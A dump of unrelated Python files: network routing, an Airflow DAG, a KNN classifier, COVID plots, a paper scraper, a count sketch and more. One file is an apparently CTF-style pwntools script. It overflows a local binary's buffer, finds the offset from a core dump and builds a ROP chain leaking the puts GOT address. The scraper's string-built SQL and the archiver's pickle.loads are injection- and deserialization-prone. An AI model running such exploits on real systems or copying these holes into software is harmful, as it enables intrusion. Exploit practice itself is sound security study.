case.__doc__ = f"ebuild.Ebuild(path = '{ebuild['path']}', overlay = mocked_overlay).{prop} == '{ebuild[prop]}'" # noqa: E501 # pylint: disable=C0301
return case
for ebuild in copy.deepcopy(EBUILDS["all"]):
_ = gen_constructor_case(ebuild)
logger.info("adding %s", _.__name__)
setattr(cls, _.__name__, _)
for prop in (
"compat",
"cpv",
"name",
"use_flags",
"version",
"restrictions",
):
_ = gen_property_case(ebuild, prop)
logger.info("adding %s", _.__name__)
setattr(cls, _.__name__, _)
class EbuildUnitTest(unittest.TestCase, metaclass=BaseEbuildMetaTest):
"""Ebuild Unit Test."""
def setUp(self) -> None:
"""Set up test cases."""
super().setUp()
self.mocked_overlay = unittest.mock.MagicMock()
type(self.mocked_overlay).directory = unittest.mock.PropertyMock(
return_value=os.path.join(FIXTURES_DIRECTORY, "overlay"),
)
|
__author__ = 'alonabas'
from priority_dict import *
from RoutingTable import *
class RouterInterface:
def __init__(self, ip, mask, mac):
temp_ip = str(ip).split('.')
temp_mask = str(mask).split('.')
temp_network = [int(part1) & int(part2) for part1, part2 in zip(temp_ip, temp_mask)]
self.network = '.'.join([str(port) for port in temp_network])
self.network = IPAddr(self.network)
self.ip = IPAddr(ip)
self.mask = IPAddr(mask)
self.mac = mac
def match(self, ip_address):
return ip_address.inNetwork(self.network, self.mask)
def __str__(self):
str1 = 'Network IP: %s, Network Mask: %s, IP address: %s, MAC adddress: %s' % (str(self.network),
str(self.mask), str(self.ip),
str(self.mac))
return str1
class EdgeData:
def __init__(self, id1, port1, id2, port2, cost):
self.router1 = (id1, port1)
self.router2 = (id2, port2)
self.cost = cost
def __str__(self):
id1, port1 = self.router1
id2, port2 = self.router2
str1 = 'Router %d, Port %d <-> Router %d, Port %d, Cost: %d' % (id1, port1, id2, port2, self.cost)
return str1
class NodeData:
def __init__(self, router_id):
self.id = router_id
self.interfaces = {}
def add_interface(self, port, router_interface):
self.interfaces[port] = router_interface
def __str__(self):
str1 = 'Router ID: %d\n' % self.id
str2 = '\n'.join(['Port: %d, Inteface: %s' % (port, str(self.interfaces[port])) for port in self.interfaces])
return str1 + str2
class Network:
__metaclass__ = SingletonType
def __init__(self):
self.graph = Graph()
config_file = open(CONFIG_FILENAME)
# config_file = open('/Users/alonabas/Dropbox/theorysem/ex2/config')
lines = config_file.readlines()
self.networks = {}
status = 1
index_start = 0
while status == 1:
index_end = lines.index('\n', index_start)
data = [line for line in lines[index_start:index_end]]
if data[0].startswith('router'):
# is router
router_id = int((data[0].replace('router', '')).strip())
node_data = NodeData(router_id)
number_ports = int((data[1].replace('ports', '')).strip())
for i in range(number_ports):
# port
port = int((data[i*4+2].replace('port', '')).strip())
ip = (data[i*4+3].replace('ip', '')).strip()
mask = (data[i*4+4].replace('mask', '')).strip()
mac = (data[i*4+5].replace('mac', '')).strip()
router_interface = RouterInterface(ip, mask, mac)
node_data.add_interface(port, router_interface)
network = (router_interface.network, router_interface.mask)
if network not in self.networks:
self.networks[network] = []
self.networks[network].append(router_id)
self.graph.add_node(router_id, node_data)
elif data[0].__eq__('link\n'):
left = ((data[1].replace('left', '').strip()).split(','))
right = ((data[2].replace('right', '').strip()).split(','))
cost = int(data[3].replace('cost', '').strip())
left_id = int(left[0].strip())
left_port = int(left[1].strip())
right_id = int(right[0].strip())
right_port = int(right[1].strip())
edge_data = EdgeData(left_id, left_port, right_id, right_port, cost)
self.graph.add_edge(left_id, right_id, edge_data)
else:
status = 0
index_start = index_end + 1
def compute_dijkstra(self, src_router):
dist = {}
previous = {}
result = {}
queue = priority_dict()
queue[src_router] = 0
#according to http://en.wikipedia.org/wiki/Dijkstra%27s_algorithm
while queue:
v = queue.smallest()
dist[v] = queue[v]
queue.pop_smallest()
if v is None:
break
neighbours = [w for w in self.graph.nodes if self.graph.get_edge(w, v) is not None]
for w in neighbours:
temp_dist = dist[v] + self.graph.get_edge(w, v).cost
if w in dist:
if temp_dist < dist[w]:
raise ValueError % "Dijkstra: found better path to already-final vertex"
elif w not in queue or temp_dist < queue[w]:
queue[w] = temp_dist
previous[w] = v
queue.update()
for router in dist:
if router != src_router:
neighbour = router
while previous[neighbour] != src_router:
neighbour = previous[neighbour]
result[router] = neighbour
return result
def compute_ospf(self):
routes = {}
for router in self.graph.nodes:
routes[router] = self.compute_dijkstra(router)
return routes
def get_routing_table(self, router):
table = RoutingTable()
#subnets of current router
this_router = self.graph.nodes[router]
for port in this_router.interfaces:
destination = (port, this_router.interfaces[port].mac, None)
table.add(this_router.interfaces[port].network, this_router.interfaces[port].mask, destination)
#subnets in other router
routes = self.compute_ospf()
for network in self.networks:
#find routers of that subnet
for cur_router_id in self.networks[network]:
if cur_router_id != router:
next_hop_router_id = routes[router][cur_router_id]
edge_data = self.graph.get_edge(router, next_hop_router_id)
(router1_id, port1_id) = edge_data.router1
(router2_id, port2_id) = edge_data.router2
if router1_id == router:
output_port = port1_id
input_port = port2_id
else:
output_port = port2_id
input_port = port1_id
output_port_mac = self.graph.nodes[router].interfaces[output_port].mac
next_hop_ip = self.graph.nodes[next_hop_router_id].interfaces[input_port].ip
destination = (output_port, output_port_mac, next_hop_ip)
table.add(network[0], network[1], destination)
return table
def print_graph(self):
for edge in self.graph.edges:
data = list(edge)
print str(self.graph.nodes[data[0]])
print str(self.graph.nodes[data[1]])
print str(self.graph.get_edge(data[0], data[1]))
a = Network()
b = a.get_routing_table(101)
b.lookup('10.0.0.1')
|
# -*- coding: utf-8 -*-
import time
import random
from pathlib import Path
from datetime import datetime, timedelta
from airflow import DAG
from airflow.operators.python import PythonOperator
from airflow.utils.dates import days_ago
HOME = Path.home()
LOG_FILE = Path(HOME, "airflow", "sanhe-test-log.txt")
def step1_callable():
msg = "sleep for 3 sec"
# with open(str(LOG_FILE), "a") as f:
# f.write(f"\n{msg}")
print(msg)
time.sleep(3)
def step2_callable():
msg = "sleep for 6 sec"
# with open(str(LOG_FILE), "a") as f:
# f.write(f"\n{msg}")
print(msg)
time.sleep(6)
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'email': ['airflow@example.com'],
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': timedelta(minutes=1),
# 'queue': 'bash_queue',
# 'pool': 'backfill',
# 'priority_weight': 10,
# 'end_date': datetime(2016, 1, 1),
# 'wait_for_downstream': False,
# 'dag': dag,
# 'sla': timedelta(hours=2),
# 'execution_timeout': timedelta(seconds=300),
# 'on_failure_callback': some_function,
# 'on_success_callback': some_other_function,
# 'on_retry_callback': another_function,
# 'sla_miss_callback': yet_another_function,
# 'trigger_rule': 'all_success'
}
with DAG(
"two_steps",
description='simple two step DAG',
start_date=days_ago(2),
schedule_interval=timedelta(seconds=60),
catchup=False,
) as dag:
step1 = PythonOperator(task_id="step1", python_callable=step1_callable)
step2 = PythonOperator(task_id="step2", python_callable=step2_callable)
step1 >> step2
|
f = open("Arduino/script.py", "w")
print("James amazing compiler")
print("report any bugs plz")
print("Ver 1.1")
print("current support: Arduino ('pins') and LCD")
indent = 0
indentA = 0
i = 0
lcdneed = False
#pin.disable([rs, en, d4, d5, d6, d7])
array = ['from time import sleep\nfrom functions import *\nLED_BUILTIN = 13\nOUTPUT = "OUTPUT"\nINPUT = "INPUT"\nHIGH = True\nLOW = False\nrender = 0\npin = 0\nSerial = 0\nlcd =0\ndef init(renderA, pinA, SerialA, lcdA, starttime):\n global render\n global pin\n global Serial\n global lcd\n lcd = lcdA\n Serial = SerialA\n render = renderA\n pin = pinA\n initsc(render, pin, starttime)\nA0, A1, A2, A3, A4, A5 = "A0","A1","A2","A3","A4","A5"\n\n']
for i in array:
f.write(i)
with open("compiler/test.txt") as file_in:
lines = []
for line in file_in:
#print("in")
#print(line)
indent = indentA
if("{"in line):
indentA = indentA + 1
elif("}"in line):
indentA = indentA - 1
elif("LiquidCrystal" in line):
line = ""
elif("#include <LiquidCrystal.h>" in line):
line = ""
elif("rs =" in line and "en =" in line and "d4 =" in line):
no = line.replace('rs =', '')
no = no.replace('en =', '')
no = no.replace('d4 =', '')
no = no.replace('d5 =', '')
no = no.replace('d6 =', '')
no = no.replace('d7 =', '')
#print(no)
text = "rs, en, d4, d5, d6, d7 ="
line = text + no
lcdneed = True
i = 0
if("} else {" in line):
line = "else:"
indent = indent - 1
indentA = indentA - 1
lock = 0
out = ""
if("void setup()" in line):
if(lcdneed):
print("LCD detected and implmented")
text = " pin.disable([rs, en, d4, d5, d6, d7]) \n"
line = line + text
if("int" in line and ")" in line and "{" in line and "(" in line):
line = line.replace("int ", "def ")
while i != len(line):
if(lock == 1):
out = out + line[i]
elif(line[i] == " "):
out = out + ''
else:
lock = 1
out = out + line[i]
i = i + 1
#print(out)
line = out
line = line.replace("//", "#")
line = line.replace("/*", '"""')
line = line.replace("*/", '"""')
line = line.replace(";", "")
line = line.replace("int ", "")
line = line.replace("const ", "")
line = line.replace("delay(", "sleep(")
line = line.replace("{", ":")
line = line.replace("}", "")
line = line.replace("loop()", "script()")
line = line.replace("void", "def ")
if("sleep(" in line):
time = line.replace(')', '')
time = time[6:]
outtime = 0
text = ""
read = 0
#print(time)
for char in time:
if(char in "12234567890"):
outtime = (outtime * 10) + int(char)
elif(char == "#"):
text = text + char
read = 1
elif(read == 1):
text = text + char
time = float(outtime / 1000)
#print(time)
if(text == ""):
text = "\n"
line = "sleep("+str(time)+") "+text
i = 0
#print(indent)
if(indent > 0):
while i != indent:
#print(i)
line = " "+line
i = i + 1
#print("out")
#print(line)
#print("")
lines.append(line)
f.write(line)
#print(lines)
f.close()
print("Done! to use run start.sh")
#print(lines)
|
from typing import Union
from goerr.colors import colors
class Msg:
"""
Class to handle the messages
"""
def fatal(self, i: Union[int, None] = None) -> str:
"""
Returns a fatal error message
"""
head = "[" + colors.red("\033[1mfatal error") + "]"
if i is not None:
head = str(i) + " " + head
return head
def error(self, i: Union[int, None] = None) -> str:
"""
Returns an error message
"""
head = "[" + colors.red("error") + "]"
if i is not None:
head = str(i) + " " + head
return head
def warning(self, i: Union[int, None] = None) -> str:
"""
Returns a warning message
"""
head = "[" + colors.purple("\033[1mwarning") + "]"
if i is not None:
head = str(i) + " " + head
return head
def info(self, i: Union[int, None] = None) -> str:
"""
Returns an info message
"""
head = "[" + colors.blue("info") + "]"
if i is not None:
head = str(i) + " " + head
return head
def via(self, i: Union[int, None] = None) -> str:
"""
Returns an via message
"""
head = "[" + colors.green("via") + "]"
if i is not None:
head = str(i) + " " + head
return head
def debug(self, i: Union[int, None] = None) -> str:
"""
Returns a debug message
"""
head = "[" + colors.yellow("debug") + "]"
if i is not None:
head = str(i) + " " + head
return head
|
import numpy as np
from math import sqrt
from collections import Counter
from Utils.AccuracyFunction import accuracy_score
class KNNClassfier:
#初始化分类器
def __init__(self,k):
assert 1 <= k , "K must be >= 1!"
self.k = k
#私有成员变量加下划线
self._X_train = None
self._y_train = None
#训练分类器
def fit(self, X_train, y_train):
assert X_train.shape[0] == y_train.shape[0], "The size of X_train must be the same as y_train!"
assert self.k <= X_train.shape[0], "K must be <= the size of X_train!"
#训练分类器。KNN算法不用训练,模型就是样本数据集
self._X_train = X_train
self._y_train = y_train
#在KNN中可以不返回,但按scikit-learn标准是返回self
return self
#用训练好的分类器预测
def predict(self, X_predict):
assert self._X_train is not None and self._y_train is not None, "must be fit before predict!"
assert self._X_train.shape[1] == X_predict.shape[1], "The features of X_train must be the same as predictx"
#调用私有的预测函数,返回的转换为scikit-learn需要的数组
y_predict = [self._predict(x) for x in X_predict]
return np.array(y_predict)
#私有的预测函数定义
def _predict(self, x):
assert x.shape[0] == self._X_train.shape[1], "The features of X_train must be the same as predict x !"
distances = [sqrt(np.sum((x_train - x) ** 2)) for x_train in self._X_train]
nearestIndex = np.argsort(distances)
topK_y = self._y_train[nearestIndex[:self.k]]
votes = Counter(topK_y)
return votes.most_common(1)[0][0]
#准确度效果评估
def score(self, X_test, y_test):
y_predict = self.predict(X_test)
return accuracy_score(y_test, y_predict)
def __repr__(self):
return "KNN(k = %d)" % self.k
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 7 01:43:15 2020
@author: Aalaap Nair & Shanmugha Balan
"""
import csv
import seaborn as sns
import pandas as pd
import matplotlib.pyplot as plt
import imageio as io
# Get the lines from the file to a processed list
def process_file(file_dest):
with open(file_dest, "r") as f:
the_reader=csv.reader(f,delimiter=",")
contents=[]
for row in the_reader:
contents.append(row)
del contents[0] #deletes header row
return contents
# A specific DataFrame maker for the covid_19_india.csv
def make_ind_df(contents, summary=False):
infected=[]
recovered=[]
deceased=[]
date_str=contents[0][1] #start date
day_count=0
rec_count=0
death_count=0
dates=[]
x = 0
# The data is made cumulative in this loop
for i in range(len(contents)):
if contents[i][1]==date_str:
day_count+=int(contents[i][-1])
death_count+=int(contents[i][-2])
rec_count+=int(contents[i][-3])
else:
dates.append(x)
x+=1
date_str=contents[i][1]
infected.append(day_count)
deceased.append(death_count)
recovered.append(rec_count)
day_count=int(contents[i][-1])
death_count=int(contents[i][-2])
rec_count=int(contents[i][-3])
infected.append(day_count)
deceased.append(death_count)
recovered.append(rec_count)
dates.append(x)
ind_dict={'Days since first infection':dates, 'Infected':infected, 'Dead':deceased, 'Recovered':recovered}
df = pd.DataFrame(ind_dict)
if summary:
df.info()
return df
# A specific DataFrame maker for the covid19_italy_region.csv
def make_ita_df(contents, summary=False):
infected=[]
recovered=[]
deceased=[]
date_str=contents[0][1] #start date
inf_count=0
rec_count=0
death_count=0
dates=[]
x = 0
# The data is made cumulative in this loop
for i in range(len(contents)):
if contents[i][1]==date_str:
inf_count+=int(contents[i][-2])
death_count+=int(contents[i][-3])
rec_count+=int(contents[i][-4])
else:
dates.append(x)
x+=1
date_str=contents[i][1]
infected.append(inf_count)
deceased.append(death_count)
recovered.append(rec_count)
inf_count=int(contents[i][-2])
death_count=int(contents[i][-3])
rec_count=int(contents[i][-4])
infected.append(inf_count)
deceased.append(death_count)
recovered.append(rec_count)
dates.append(x)
ita_dict={'Days since first infection':dates, 'Infected':infected, 'Dead':deceased, 'Recovered':recovered}
df = pd.DataFrame(ita_dict)
if summary:
df.info()
return df
# A specific DataFrame maker for the us_covid19_daily.csv
def make_usa_df(contents, summary=False):
infected=[]
recovered=[]
deceased=[]
dates=[]
x = len(contents)
for i in range(len(contents)):
dates.insert(0, x)
x-=1
infected.insert(0, int(contents[i][2]))
if (contents[i][14]==''):
contents[i][14] = 0
if (contents[i][11]==''):
contents[i][11] = 0
deceased.insert(0, int(contents[i][14]))
recovered.insert(0, int(contents[i][11]))
usa_dict={'Days since first infection':dates, 'Infected':infected, 'Dead':deceased, 'Recovered':recovered}
df = pd.DataFrame(usa_dict)
if summary:
df.info()
return df
# A specific DataFrame maker for the covid19_korea.csv
def make_kor_df(contents, summary=False):
infected=[]
recovered=[]
deceased=[]
dates=[]
x = 0
for i in range(len(contents)):
dates.append(x)
x+=1
infected.append(int(contents[i][-3]))
deceased.append(int(contents[i][-1]))
recovered.append(int(contents[i][-2]))
kor_dict={'Days since first infection':dates, 'Infected':infected, 'Dead':deceased, 'Recovered':recovered}
df = pd.DataFrame(kor_dict)
if summary:
df.info()
return df
# A simple despined line plot
def singlelineplot(prop, df, color, label):
sns.lineplot(x='Days since first infection', y=prop, data=df, color=color, label=label)
sns.despine()
# A comparative line plot between two countries
def compareproperties(prop, df1, df1_name, df2, df2_name):
plt.figure()
sns.set(style='darkgrid')
singlelineplot(prop, df1, "#00ff00", label=df1_name)
singlelineplot(prop, df2, "#009900", label=df2_name)
plt.title(prop)
plt.show()
# A graph of the infected, dead and recovered in a country
def countrysituation(df, country):
plt.figure()
sns.set(style='dark')
singlelineplot("Infected", df, "#da4272", "Infected")
singlelineplot("Dead", df, "#000000", "Dead")
singlelineplot("Recovered", df, "#10d260", "Recovered")
plt.title(country)
plt.show()
# Generates a plot with every progressing day
# Primarily, a feeder function for gifize()
def animate(df, prop, country):
pics = []
rows = df.size/4
y_limit = max(df[prop])
title = str(prop + " in " + country)
for i in range(1, int(rows)):
plt.figure(figsize=(10,6))
plt.title(title, fontsize=20)
plt.xlim(0, rows)
plt.ylim(0, y_limit)
plt.xlabel('Days since first infection', fontsize=15)
plt.ylabel(prop, fontsize=15)
data = df.iloc[:i]
sns.lineplot(x="Days since first infection", y=data[prop], data=data)
filename = str(str(prop) + "/" + str(i) + ".png")
plt.savefig(filename)
pics.append(filename)
return pics
# Converts the pictures to a gif
def gifize(pics):
images = []
for img in pics:
images.append(io.imread(img))
io.mimsave("covid.gif", images)
# Invoking the functions to build the DataFrames
ind_df = make_ind_df(process_file("covid_19_india.csv"))
ita_df = make_ita_df(process_file("covid19_italy_region.csv"))
usa_df = make_usa_df(process_file("us_covid19_daily.csv"))
kor_df = make_kor_df(process_file("covid19_korea.csv"))
# Comparing stats in two countries
compareproperties("Infected", ind_df, "India", kor_df, "Korea")
compareproperties("Dead", ita_df, "Italy", usa_df, "USA")
# Comparing the infected of all 4 countries
prop = 'Infected'
plt.figure()
sns.set(style='darkgrid')
singlelineplot(prop, ind_df, "#173367", label='India')
singlelineplot(prop, kor_df, "#f67bad", label='Korea')
singlelineplot(prop, usa_df, "#00ff00", label='USA')
singlelineplot(prop, ita_df, "#26c0e5", label='Italy')
plt.title(prop)
plt.show()
# Plotting the infected, dead and recovered in India
countrysituation(ind_df, 'India')
# Generating the increase of infected in Italy
gifize(animate(ita_df, "Infected", "Italy"))
|
import pickle as pk
class Archiver:
def ZipData(self, data):
pass
def UnZipData(self, data):
pass
def Zip(self, data):
data = self.ZipData(data)
data = pk.dumps(data)
return data
def UnZip(self, data):
data = pk.loads(data)
data = self.UnZipData(data)
return data |
#coding:utf-8
"""
@file: IEEE_download.py
@author: lyn
@contact: tonylu716@gmail.com
@python: 3.3
@editor: PyCharm
@create: 2016-08-31 14:43
@description:
专门为IEEE出版社的pdf下载模块
"""
import sys,os
up_level_N = 2
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
root_dir = SCRIPT_DIR
for i in range(up_level_N):
root_dir = os.path.normpath(os.path.join(root_dir, '..'))
sys.path.append(root_dir)
from journal_parser.IEEE_Parser import IEEE_HTML_Parser,Article,get_ieee_pdf_link
from Journals_Task.journal_pdf_url_generators.PdfUrlGenerator import *
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from db_config import DB_CONNS_POOL
cur = DB_CONNS_POOL.new_db_cursor()
class IEEE_Search_Model:
def __init__(self,title,google_id,driver):
self.title = title
self.google_id = google_id
for i in range(10):
search_result_url = 'http://ieeexplore.ieee.org/search/searchresult.jsp?queryText={}&newsearch=true'\
.format('%20'.join(title.split(' ')))
driver.get(
url = search_result_url
)#尝试selenium进入搜索页
try:
WebDriverWait(driver, 20).until(
EC.presence_of_element_located((By.CLASS_NAME,'List-results-items'))
)#等待网站的ajax加载完,items呈现在页面上,交给parser处理
try:
title = title[:40]
except:
pass
print('IEEE_Search_Model:\n\tGot search result of <{}>\n\tDeliver to parser...'.format(title+'...'))
break
except Exception as e:
print('[Error] in IEEE_Search_Model():{}'.format(str(e)))
print('The url of issue is:{}\nReload again..'.format(search_result_url))
self.sec = IEEE_HTML_Parser(driver).sections[0]
self.driver = driver
def get_pdf_url(self):
pdf_page_url = Article(self.sec).pdf_page_url
if pdf_page_url:
try:
sql = "update articles set pdf_temp_url = '{}' where google_id = '{}'".format(pdf_page_url,self.google_id)
cur.execute(sql)
except Exception as e:
print('[Error] in get_pdf_url()_update_pdf_temp_url:{}'.format(str(e)))
print('Except SQL is {}'.format(sql))
return get_ieee_pdf_link(pdf_page_url,self.driver)
def get_ieee_pdf_url_func(driver,unfinished_item):
pdf_temp_url = unfinished_item[2]
if pdf_temp_url:
return get_ieee_pdf_link(pdf_temp_url,driver)
'''
else:
return IEEE_Search_Model(
title = unfinished_item[0],
google_id = unfinished_item[1],
driver=driver
).get_pdf_url()
'''
class IEEE_pdf_url_generator(PdfUrlGenerator):
def __init__(self):
PdfUrlGenerator.__init__(self)
def get_unfinished_items(self):
ret = self._get_unfinished_items(self.query_sql)
print('IEEE_pdf_url_generator:\n\tGot {} new items in limit {}...'.format(len(ret),self.query_limit))
return ret
def generate(self,unfinished_item):
#从title出发,反馈pdf_url给db
return self._generate(unfinished_item,
google_id_index = 1,
get_pdf_url_func = get_ieee_pdf_url_func
)
def run(self,thread_counts=16,visual=True,limit=1000):
self.query_limit = limit
self._run(thread_counts,visual)
self.query_sql = "select title,google_id,pdf_temp_url from articles where resource_link is null\
and link like '%ieee%' and pdf_temp_url is not null ORDER by id desc limit {}".format(limit)
self._task_thread_pool.map(self.generate,self.get_unfinished_items())
self._close()
if __name__=='__main__':
from crawl_tools.WatchDog import close_procs_by_keyword
visual = False
if visual:
close_procs_by_keyword(keyword='chrome')
else:
close_procs_by_keyword(keyword='phantom')
IEEE_pdf_url_generator().run(thread_counts=8,visual=visual,limit=1000) |
from pwn import *
from pprint import pprint
context.binary = "./main.elf"
context.bits = 64
context.arch = "amd64"
elf = ELF("./main.elf")
io = process("./main.elf")
print(io.recvline().decode("utf-8"))
payload = cyclic(345, n=8)
io.sendline(payload)
io.wait_for_close()
core = Core("./core")
fault_address = enhex(pack(core.fault_addr, endian='big'))
vuln_index = cyclic_find(unhex(str(fault_address)), n=8)
print(f"[INFO] - Vulnerable index is : {vuln_index}")
rop = ROP("./main.elf")
rop.call(elf.symbols["puts"], [elf.got["puts"]])
print(f"[INFO] - puts symbols address : {elf.symbols['puts']}")
print(f"[INFO] - puts got address : {elf.got['puts']}")
io = process("./main.elf")
print(io.recvline().decode("utf-8"))
payload = [
cyclic(vuln_index),
rop.chain()
]
payload = b"".join(payload)
write("payload2", payload)
io.sendline(payload)
io.wait_for_close()
core = Core("./core")
|
import numpy as np
def trapz(func,a,b,N):
func = lambda x: x**4 - 2*x + 1
h = (b-a)/N
k = np.arange(1,N)
It = h*(0.5*func(a) + 0.5*func(b) + func(a+k*h).sum())
return It
def simps(func,a,b,N):
func = lambda x: x**4 - 2*x + 1
h = (b-a)/N
k1 = np.arange(1,N/2+1)
k2 = np.arange(1,N/2)
Is = (1./3.)*h*(func(a) + func(b) + 4.*func(a+(2*k1-1)*h).sum() + 2.*func(a+2*k2*h).sum())
return Is |
import math
import numpy as np
import copy
import torch
LARGEPRIME = 2**61-1
cache = {}
#import line_profiler
#import atexit
#profile = line_profiler.LineProfiler()
#atexit.register(profile.print_stats)
class CSVec(object):
""" Count Sketch of a vector
Treating a vector as a stream of tokens with associated weights,
this class computes the count sketch of an input vector, and
supports operations on the resulting sketch.
public methods: zero, unSketch, l2estimate, __add__, __iadd__
"""
def __init__(self, d, c, r, doInitialize=True, device=None,
numBlocks=1):
""" Constductor for CSVec
Args:
d: the cardinality of the skteched vector
c: the number of columns (buckets) in the sketch
r: the number of rows in the sketch
doInitialize: if False, you are responsible for setting
self.table, self.signs, self.buckets, self.blockSigns,
and self.blockOffsets
device: which device to use (cuda or cpu). If None, chooses
cuda if available, else cpu
numBlocks: mechanism to reduce memory consumption. A value
of 1 leads to a normal sketch. Higher values reduce
peak memory consumption proportionally but decrease
randomness of the hashes
Note:
Since sketching a vector always requires the hash functions
to be evaluated for all of 0..d-1, we precompute the
hash values in the constructor. However, this takes d*r
memory, which is sometimes too big. We therefore only
compute hashes of 0..(d/numBlocks - 1), and we let the
hash of all other tokens be the hash of that token modulo
d/numBlocks. In order to recover some of the lost randomness,
we add a random number to each "block" (self.blockOffsets)
and multiply each block by a random sign (self.blockSigns)
"""
# save random quantities in a module-level variable so we can
# reuse them if someone else makes a sketch with the same d, c, r
global cache
self.r = r # num of rows
self.c = c # num of columns
# need int() here b/c annoying np returning np.int64...
self.d = int(d) # vector dimensionality
# reduce memory consumption of signs & buckets by constraining
# them to be repetitions of a single block
self.numBlocks = numBlocks
# choose the device automatically if none was given
if device is None:
device = 'cuda' if torch.cuda.is_available() else 'cpu'
else:
if (not isinstance(device, torch.device) and
not ("cuda" in device or device == "cpu")):
msg = "Expected a valid device, got {}"
raise ValueError(msg.format(device))
self.device = device
# this flag indicates that the caller plans to set up
# self.signs, self.buckets, self.blockSigns, and self.blockOffsets
# itself (e.g. self.deepcopy does this)
if not doInitialize:
return
# initialize the sketch to all zeros
self.table = torch.zeros((r, c), device=self.device)
# if we already have these, don't do the same computation
# again (wasting memory storing the same data several times)
cacheKey = (d, c, r, numBlocks, device)
if cacheKey in cache:
self.signs = cache[cacheKey]["signs"]
self.buckets = cache[cacheKey]["buckets"]
if self.numBlocks > 1:
self.blockSigns = cache[cacheKey]["blockSigns"]
self.blockOffsets = cache[cacheKey]["blockOffsets"]
return
# initialize hashing functions for each row:
# 2 random numbers for bucket hashes + 4 random numbers for
# sign hashes
# maintain existing random state so we don't mess with
# the main module trying to set the random seed but still
# get reproducible hashes for the same value of r
# do all these computations on the CPU, since pytorch
# is incapable of in-place mod, and without that, this
# computation uses up too much GPU RAM
rand_state = torch.random.get_rng_state()
torch.random.manual_seed(42)
hashes = torch.randint(0, LARGEPRIME, (r, 6),
dtype=torch.int64, device="cpu")
# compute random blockOffsets and blockSigns
if self.numBlocks > 1:
nTokens = self.d // numBlocks
if self.d % numBlocks != 0:
# so that we only need numBlocks repetitions
nTokens += 1
self.blockSigns = torch.randint(0, 2, size=(self.numBlocks,),
device=self.device) * 2 - 1
self.blockOffsets = torch.randint(0, self.c,
size=(self.numBlocks,),
device=self.device)
else:
assert(numBlocks == 1)
nTokens = self.d
torch.random.set_rng_state(rand_state)
# tokens are the indices of the vector entries
tokens = torch.arange(nTokens, dtype=torch.int64, device="cpu")
tokens = tokens.reshape((1, nTokens))
# computing sign hashes (4 wise independence)
h1 = hashes[:,2:3]
h2 = hashes[:,3:4]
h3 = hashes[:,4:5]
h4 = hashes[:,5:6]
self.signs = (((h1 * tokens + h2) * tokens + h3) * tokens + h4)
self.signs = ((self.signs % LARGEPRIME % 2) * 2 - 1).float()
# only move to device now, since this computation takes too
# much memory if done on the GPU, and it can't be done
# in-place because pytorch (1.0.1) has no in-place modulo
# function that works on large numbers
self.signs = self.signs.to(self.device)
# computing bucket hashes (2-wise independence)
h1 = hashes[:,0:1]
h2 = hashes[:,1:2]
self.buckets = ((h1 * tokens) + h2) % LARGEPRIME % self.c
# only move to device now. See comment above.
# can't cast this to int, unfortunately, since we index with
# this below, and pytorch only lets us index with long
# tensors
self.buckets = self.buckets.to(self.device)
cache[cacheKey] = {"signs": self.signs,
"buckets": self.buckets}
if numBlocks > 1:
cache[cacheKey].update({"blockSigns": self.blockSigns,
"blockOffsets": self.blockOffsets})
def zero(self):
""" Set all the entries of the sketch to zero """
self.table.zero_()
def cpu_(self):
self.device = "cpu"
self.table = self.table.cpu()
def cuda_(self, device="cuda"):
self.device = device
self.table = self.table.cuda()
def half_(self):
self.table = self.table.half()
def float_(self):
self.table = self.table.float()
def __deepcopy__(self, memodict={}):
# don't initialize new CSVec, since that will calculate bc,
# which is slow, even though we can just copy it over
# directly without recomputing it
newCSVec = CSVec(d=self.d, c=self.c, r=self.r,
doInitialize=False, device=self.device,
numBlocks=self.numBlocks)
newCSVec.table = copy.deepcopy(self.table)
global cache
cachedVals = cache[(self.d, self.c, self.r, self.numBlocks, self.device)]
newCSVec.signs = cachedVals["signs"]
newCSVec.buckets = cachedVals["buckets"]
if self.numBlocks > 1:
newCSVec.blockSigns = cachedVals["blockSigns"]
newCSVec.blockOffsets = cachedVals["blockOffsets"]
return newCSVec
def __imul__(self, other):
if isinstance(other, int) or isinstance(other, float):
self.table = self.table.mul_(other)
else:
raise ValueError(f"Can't multiply a CSVec by {other}")
return self
def __truediv__(self, other):
if isinstance(other, int) or isinstance(other, float):
self.table = self.table.div_(other)
else:
raise ValueError(f"Can't divide a CSVec by {other}")
return self
def __add__(self, other):
""" Returns the sum of self with other
Args:
other: a CSVec with identical values of d, c, and r
"""
# a bit roundabout in order to avoid initializing a new CSVec
returnCSVec = copy.deepcopy(self)
returnCSVec += other
return returnCSVec
def __iadd__(self, other):
""" Accumulates another sketch
Args:
other: a CSVec with identical values of d, c, r, device, numBlocks
"""
if isinstance(other, CSVec):
# merges csh sketch into self
assert(self.d == other.d)
assert(self.c == other.c)
assert(self.r == other.r)
assert(self.device == other.device)
assert(self.numBlocks == other.numBlocks)
self.table += other.table
else:
raise ValueError("Can't add this to a CSVec: {}".format(other))
return self
def accumulateTable(self, table):
""" Adds a CSVec.table to self
Args:
table: the table to be added
"""
if table.size() != self.table.size():
msg = "Passed in table has size {}, expecting {}"
raise ValueError(msg.format(table.size(), self.table.size()))
self.table += table
def accumulateVec(self, vec):
""" Sketches a vector and adds the result to self
Args:
vec: the vector to be sketched
"""
assert(len(vec.size()) == 1 and vec.size()[0] == self.d)
# the vector is sketched to each row independently
for r in range(self.r):
buckets = self.buckets[r,:].to(self.device)
signs = self.signs[r,:].to(self.device)
# the main computation here is the bincount below, but
# there's lots of index accounitng leading up to it due
# to numBlocks being potentially > 1
for blockId in range(self.numBlocks):
start = blockId * buckets.size()[0]
end = (blockId + 1) * buckets.size()[0]
end = min(end, self.d)
offsetBuckets = buckets[:end-start].clone()
offsetSigns = signs[:end-start].clone()
if self.numBlocks > 1:
offsetBuckets += self.blockOffsets[blockId]
offsetBuckets %= self.c
offsetSigns *= self.blockSigns[blockId]
# bincount computes the sum of all values in the vector
# that correspond to each bucket
self.table[r,:] += torch.bincount(
input=offsetBuckets,
weights=offsetSigns * vec[start:end],
minlength=self.c
)
def _findHHK(self, k):
assert(k is not None)
#tokens = torch.arange(self.d, device=self.device)
#vals = self._findValues(tokens)
vals = self._findAllValues()
# sort is faster than torch.topk...
#HHs = torch.sort(vals**2)[1][-k:]
